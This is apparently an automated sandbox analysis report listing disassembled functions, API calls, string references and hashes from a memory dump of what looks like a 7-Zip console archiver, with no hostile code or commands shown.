AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2AC4
GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2ACE

Strings

SeSecurityPrivilege, xrefs: 009E2AA2

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
String ID: SeSecurityPrivilege
API String ID: 3475889169-2333288578
Opcode ID: b47eb38371d4374e04b873c6777e5d156e8339040283c28b116866304dfe73e0
Instruction ID: 308214ad5aaea6c598614af93654324376d489ac8c519c3073b682da824fe0af
Opcode Fuzzy Hash: b47eb38371d4374e04b873c6777e5d156e8339040283c28b116866304dfe73e0
Instruction Fuzzy Hash: 2A1161B9900219AFDB21EFE5DC85AEFB77CFB84344F400539E412E2190D7758E09CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A13FD5 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A13FDA

Part of subcall function 00A1B693: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A1B6DC

Strings

, xrefs: 00A14027

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionH_prologThrow
String ID:
API String ID: 461045715-3916222277
Opcode ID: 236beb5483d16363c59d743a3ebb096eeb7a76dbdce865cb09e807ed3eb34dff
Instruction ID: bfdcace993ab966844943b9eaac2803a55fd5bb9d831fbb8c371a39958c735e6
Opcode Fuzzy Hash: 236beb5483d16363c59d743a3ebb096eeb7a76dbdce865cb09e807ed3eb34dff
Instruction Fuzzy Hash: A092AC31A04249DFDF14DFA8C984BEEBBB1BF49304F248199E815AB291C734ED85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D65A1 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D65A6

Part of subcall function 009D6581: FindClose.KERNELBASE(00000000,?,009D65B9), ref: 009D658C

FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 009D65DE
FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 009D6617

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: Find$FileFirst$CloseH_prolog
String ID:
API String ID: 3371352514-0
Opcode ID: 5c2e4e4b5b02a1f7bc326ba544e06f6e79ece4cb8cb1edc7316504d9f3f989f3
Instruction ID: 32db991bb7fa961f9e35b6ea0d7357fcee72a6f8e80cf7f8f57d9bbafe191c37
Opcode Fuzzy Hash: 5c2e4e4b5b02a1f7bc326ba544e06f6e79ece4cb8cb1edc7316504d9f3f989f3
Instruction Fuzzy Hash: B111B2718402099FCB20EF64D8566FEBB79EF94320F50872AE951573E1CB318E86DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A08E42 Relevance: 56.7, APIs: 15, Strings: 17, Instructions: 690
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Alternate Streams: , xrefs: 00A097F0
Archives with Errors: , xrefs: 00A09624
Compressed: , xrefs: 00A09862
OK archives: , xrefs: 00A095AA
Files: , xrefs: 00A097C0
ERROR:, xrefs: 00A0952E
Warnings: , xrefs: 00A096A5
Size: , xrefs: 00A09837
Sub items Errors: , xrefs: 00A098BC
Can't open as archive: , xrefs: 00A095E5
S, xrefs: 00A09A64
Folders: , xrefs: 00A09770
Archives: , xrefs: 00A09586
7zCon.sfx, xrefs: 00A08E73
Alternate Streams Size: , xrefs: 00A09812
Archives with Warnings: , xrefs: 00A0965E
Open Errors: , xrefs: 00A096F5

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$ExceptionThrow
String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $S
API String ID: 3665150552-3874897568
Opcode ID: 131559dba7e414e06441bc9f10c8c9e123d43baf9997652369158f5a6b129c27
Instruction ID: 77ec26fe341451572feb433956162dae8fc0c9e5d528da0d4efb3dc54d768fe4
Opcode Fuzzy Hash: 131559dba7e414e06441bc9f10c8c9e123d43baf9997652369158f5a6b129c27
Instruction Fuzzy Hash: B1528C31A0425CDFDF26DBA4D895BEEBBB5BF94300F14819AE04967292DB306E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00A0925B Relevance: 56.5, APIs: 15, Strings: 17, Instructions: 503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT(Scanning the drive for archives:), ref: 00A0926D

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

Alternate Streams: , xrefs: 00A097F0
Archives with Errors: , xrefs: 00A09624
Compressed: , xrefs: 00A09862
OK archives: , xrefs: 00A095AA
Files: , xrefs: 00A097C0
ERROR:, xrefs: 00A0952E
Warnings: , xrefs: 00A096A5
Size: , xrefs: 00A09837
Can't open as archive: , xrefs: 00A095E5
S, xrefs: 00A09A64
Folders: , xrefs: 00A09770
Archives: , xrefs: 00A09586
Alternate Streams Size: , xrefs: 00A09812
3", xrefs: 00A09347
Archives with Warnings: , xrefs: 00A0965E
Scanning the drive for archives:, xrefs: 00A09268
Open Errors: , xrefs: 00A096F5

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputcfputs
String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $3"$S
API String ID: 269475090-2029757534
Opcode ID: 03b963e8a01842bb8c10da615890684b48806fa40913fd21ee305ce27d87f408
Instruction ID: f47cdebb606c12517949ec65599ac765b2fff56cec7fe8d33ccd51c160a9e5e0
Opcode Fuzzy Hash: 03b963e8a01842bb8c10da615890684b48806fa40913fd21ee305ce27d87f408
Instruction Fuzzy Hash: 2B227D31904258EFDF26DBA4D855BEEFBB5FF94300F14849AE04967292DB706A84CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00A0876C Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 569
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A0A3E5: fputs.MSVCRT ref: 00A0A3FE
Part of subcall function 00A0A3E5: fputs.MSVCRT ref: 00A0A415

GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00A087EC
GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00A087F3
_CxxThrowException.MSVCRT(?,00A50AD8), ref: 00A088A6
_CxxThrowException.MSVCRT(?,00A50AD8), ref: 00A088EA

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

Strings

Hashers:, xrefs: 00A08D44
S, xrefs: 00A09A64
P, xrefs: 00A087DD
|| , xrefs: 00A08B90
Formats:, xrefs: 00A08994
KSNFMGOPBELHXCc+a+m+r+, xrefs: 00A089A8
offset=, xrefs: 00A08B5B
, xrefs: 00A089E4
Codecs:, xrefs: 00A08C5D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$S
API String ID: 377453556-626468309
Opcode ID: fb38b3c2dee576297dac91141a0387551cb1c1aadc86ed56d2d5f262393bba2f
Instruction ID: 0be6ef30a368f71b5f250c989e75b1cc21549c0dc5dcfae44fdfc3ed41318d83
Opcode Fuzzy Hash: fb38b3c2dee576297dac91141a0387551cb1c1aadc86ed56d2d5f262393bba2f
Instruction Fuzzy Hash: 12229E71A00208DFDF14EF94E885BADBBB1FF98301F20405AE545A72D2CB399A85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 009E07E4 Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009E07E9

Part of subcall function 009D13F5: __EH_prolog.LIBCMT ref: 009D13FA

_CxxThrowException.MSVCRT(?,00A51428), ref: 009E0833
_fileno.MSVCRT ref: 009E0844
_isatty.MSVCRT ref: 009E084D
_fileno.MSVCRT ref: 009E0863
_isatty.MSVCRT ref: 009E0866
_fileno.MSVCRT ref: 009E0879
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E09C1
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E0AC3
wcscmp.MSVCRT ref: 009E0AD0
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E0B0A
_isatty.MSVCRT ref: 009E087C

Part of subcall function 009F0B3C: __EH_prolog.LIBCMT ref: 009F0B41

_CxxThrowException.MSVCRT(?,00A51428), ref: 009E0B32
GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 009E0B41
SetProcessAffinityMask.KERNEL32(00000000), ref: 009E0B48
GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 009E0B52

Strings

unsupported value -stm, xrefs: 009E0B1F
Unsupported switch postfix for -slp, xrefs: 009E0AF7
Unsupported switch postfix -bb, xrefs: 009E09AE
SeLockMemoryPrivilege, xrefs: 009E0A2E
Unsupported switch postfix -stm, xrefs: 009E0AB0
: ERROR : , xrefs: 009E0B58
Set process affinity mask: , xrefs: 009E0A7A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
API String ID: 1826148334-1115009270
Opcode ID: 52a1b8b06bdf377a880ca1c2dbfac9b5ea8ab14c1b23b3e4bb662c27e103b89c
Instruction ID: 0709421b3641a1c6490afd7ee4e37f8fb6ad2c72f1705818b48c0457cbf0666e
Opcode Fuzzy Hash: 52a1b8b06bdf377a880ca1c2dbfac9b5ea8ab14c1b23b3e4bb662c27e103b89c
Instruction Fuzzy Hash: CEC1D475900385AFDB12DFA8D888BDABBF4BF99300F048499E49497293C7B4AD84CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A06E41 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A06E46
fputs.MSVCRT ref: 00A06E7C

Part of subcall function 00A07170: __EH_prolog.LIBCMT ref: 00A07175
Part of subcall function 00A07170: fputs.MSVCRT ref: 00A0718A
Part of subcall function 00A07170: fputs.MSVCRT ref: 00A07193

fputs.MSVCRT ref: 00A06EA9

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D9312: VariantClear.OLEAUT32(?), ref: 009D9334

SysFreeString.OLEAUT32(00000000), ref: 00A06FD9
fputs.MSVCRT ref: 00A06FFC
SysFreeString.OLEAUT32(00000000), ref: 00A07096
SysFreeString.OLEAUT32(00000000), ref: 00A070E0

Strings

----, xrefs: 00A06FF7
Warning: The archive is open with offset, xrefs: 00A06EA4
Type, xrefs: 00A06F14
--, xrefs: 00A06E71
Path, xrefs: 00A06E87

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$FreeString$H_prolog$ClearVariantfputc
String ID: --$----$Path$Type$Warning: The archive is open with offset
API String ID: 2889736305-3797937567
Opcode ID: 223d51e376e74fee28b8f74059f23bbfdb5da7753903bfa95c83084e702aacf9
Instruction ID: 8c60404ff3badad9c4b181634c48d57b34f2eb83680e72641cfb007031dcf849
Opcode Fuzzy Hash: 223d51e376e74fee28b8f74059f23bbfdb5da7753903bfa95c83084e702aacf9
Instruction Fuzzy Hash: F4917935A04209EFDB14DFA4E985EAEB7B5FF88314F204229E406A72D0DB71AD15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A05145 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A0514A
fputs.MSVCRT ref: 00A0524B

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

fputs.MSVCRT ref: 00A05333
fputs.MSVCRT ref: 00A0544B
fputs.MSVCRT ref: 00A0549A

Part of subcall function 009D1FDA: fflush.MSVCRT ref: 009D1FDC

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

ERRORS:, xrefs: 00A0520C, 00A05246
Can't allocate required memory, xrefs: 00A05495
WARNINGS:, xrefs: 00A052F4, 00A0532E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog$fflushfree
String ID: Can't allocate required memory$ERRORS:$WARNINGS:
API String ID: 1750297421-1898165966
Opcode ID: ae519093919ccd129c00385827bf538eedeb96578de0a87b86e8c82f34d1e26f
Instruction ID: ce44e20e250a34604ceac084753f3336cd5a6c53479cb49ededd36ce52707538
Opcode Fuzzy Hash: ae519093919ccd129c00385827bf538eedeb96578de0a87b86e8c82f34d1e26f
Instruction Fuzzy Hash: 82B17F35A01B099FDB24EF74D9A1BEBB7A2FF84304F04852EE55A47291CB71A844CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A05552 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A05557
EnterCriticalSection.KERNEL32(00A5A878), ref: 00A0556D
fputs.MSVCRT ref: 00A055F7
LeaveCriticalSection.KERNEL32(00A5A878), ref: 00A05730

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

fputs.MSVCRT ref: 00A0563D

Part of subcall function 009D224A: fputs.MSVCRT ref: 009D2267

fputs.MSVCRT ref: 00A056C5
fputs.MSVCRT ref: 00A056E2

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

Sub items Errors: , xrefs: 00A05638

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$CriticalSection$EnterH_prologLeavefputc
String ID: Sub items Errors:
API String ID: 2670240366-2637271492
Opcode ID: 86d83d4d41283a2f3d623fe2572a9ff69a50f5a31b8f584b267535758228ea21
Instruction ID: 85f7b8538e4bd644b8681f04ff25b38dc3fab7610b24543b12e1ed49397cbf98
Opcode Fuzzy Hash: 86d83d4d41283a2f3d623fe2572a9ff69a50f5a31b8f584b267535758228ea21
Instruction Fuzzy Hash: 3F519D36900A04DFC724DB78E895AAAB7E2FF84311F54892EE15B472A1DB317C45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 009D9852 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 009D9876
GetProcAddress.KERNEL32(00000000), ref: 009D987D
GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 009D988B
GlobalMemoryStatus.KERNEL32(?), ref: 009D98BD

Strings

@, xrefs: 009D986F
, xrefs: 009D98B5
GlobalMemoryStatusEx, xrefs: 009D985B
kernel32.dll, xrefs: 009D9860

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: GlobalMemoryStatus$AddressHandleModuleProc
String ID: $@$GlobalMemoryStatusEx$kernel32.dll
API String ID: 180289352-802862622
Opcode ID: b3ca3919df790a463106f6784eb0aacef01805266cb235195299106ac0665215
Instruction ID: e14bff7f5ffee8efde35d04354da2c0903fa3b6466e67c639e0411d17955e94a
Opcode Fuzzy Hash: b3ca3919df790a463106f6784eb0aacef01805266cb235195299106ac0665215
Instruction Fuzzy Hash: 75115B7894030A9FDB10EFE4C889B9EB7F8FF45B01F108819E442A7340D779A884DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F546 Relevance: 10.6, APIs: 7, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00A3F572
__p__fmode.MSVCRT ref: 00A3F587
__p__commode.MSVCRT ref: 00A3F595
_initterm.MSVCRT ref: 00A3F5D8
__getmainargs.MSVCRT ref: 00A3F5FB
_initterm.MSVCRT ref: 00A3F60B
__p___initenv.MSVCRT ref: 00A3F610

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
String ID:
API String ID: 4012487245-0
Opcode ID: 9a0904b65e47e8492f15dc38e21069af5131b4fa2132ec098e4f5f3463957b7a
Instruction ID: 709115300f4ace885fa2a1a7179a0661e9d747d6b8507fa4b2823885bd4da061
Opcode Fuzzy Hash: 9a0904b65e47e8492f15dc38e21069af5131b4fa2132ec098e4f5f3463957b7a
Instruction Fuzzy Hash: 09213579900309EFCB51DFE4EC4AE9ABB78FB09721F004719F522A22A0DB755446CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F5BD Relevance: 10.5, APIs: 7, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__setusermatherr.MSVCRT ref: 00A3F5C2

Part of subcall function 00A3F674: _controlfp.MSVCRT ref: 00A3F67E

_initterm.MSVCRT ref: 00A3F5D8
__getmainargs.MSVCRT ref: 00A3F5FB
_initterm.MSVCRT ref: 00A3F60B
__p___initenv.MSVCRT ref: 00A3F610
exit.KERNELBASE ref: 00A3F630
_XcptFilter.MSVCRT ref: 00A3F642

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
String ID:
API String ID: 279829931-0
Opcode ID: 4b71a28a5bd1ac9fea9691ae6c97a0399d91680aa182df33580df095c42a856c
Instruction ID: b393a3c50c259b9dec9991e18f8c599335a120ff13beb9a1d80c3e561b4c858f
Opcode Fuzzy Hash: 4b71a28a5bd1ac9fea9691ae6c97a0399d91680aa182df33580df095c42a856c
Instruction Fuzzy Hash: 0701E979D10209AFCF45DFE0DD4ACEEBB79FF49711B100519F901A22A0DB369815DB21

Uniqueness

Uniqueness Score: -1.00%

Function 009D5C70 Relevance: 9.1, APIs: 6, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009D5C75
CreateDirectoryW.KERNELBASE(?,00000000,00000000,?,00000000), ref: 009D5C97
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 009D5CA8
CreateDirectoryW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 009D5CE3
GetLastError.KERNEL32 ref: 009D5CF1
GetLastError.KERNEL32(00000000,?,00000000), ref: 009D5D4B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLast$CreateDirectory$H_prolog
String ID:
API String ID: 798237638-0
Opcode ID: 15565ab77383ceb666cc485749bf01bc120c9463e63c55add2db1835fc7c0c6b
Instruction ID: b7697110fa4bc93422e0b41247bcfc4f6816d73d84bd6ccc8398e324d589bbe1
Opcode Fuzzy Hash: 15565ab77383ceb666cc485749bf01bc120c9463e63c55add2db1835fc7c0c6b
Instruction Fuzzy Hash: 9331F535980614EADF10EFB4DC5A7EE7B3AAFA1300F25841AE405673D2CB354945DB70

Uniqueness

Uniqueness Score: -1.00%

Function 009F0621 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009F0626

Part of subcall function 009EEFE3: __EH_prolog.LIBCMT ref: 009EEFE8

Part of subcall function 009EF3F7: __EH_prolog.LIBCMT ref: 009EF3FC

_CxxThrowException.MSVCRT(?,00A51428), ref: 009F072A

Part of subcall function 009F086E: __EH_prolog.LIBCMT ref: 009F0873

Strings

Duplicate archive path:, xrefs: 009F0856

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID: Duplicate archive path:
API String ID: 2366012087-4000988232
Opcode ID: ac745cfe4b5657cc6bb76da5427229ebf4d48396e1b9ea5014d84eaa9a418420
Instruction ID: 66e5016218a34b70ca0a11c4e999d968325fef3831b074328551792815e5d13e
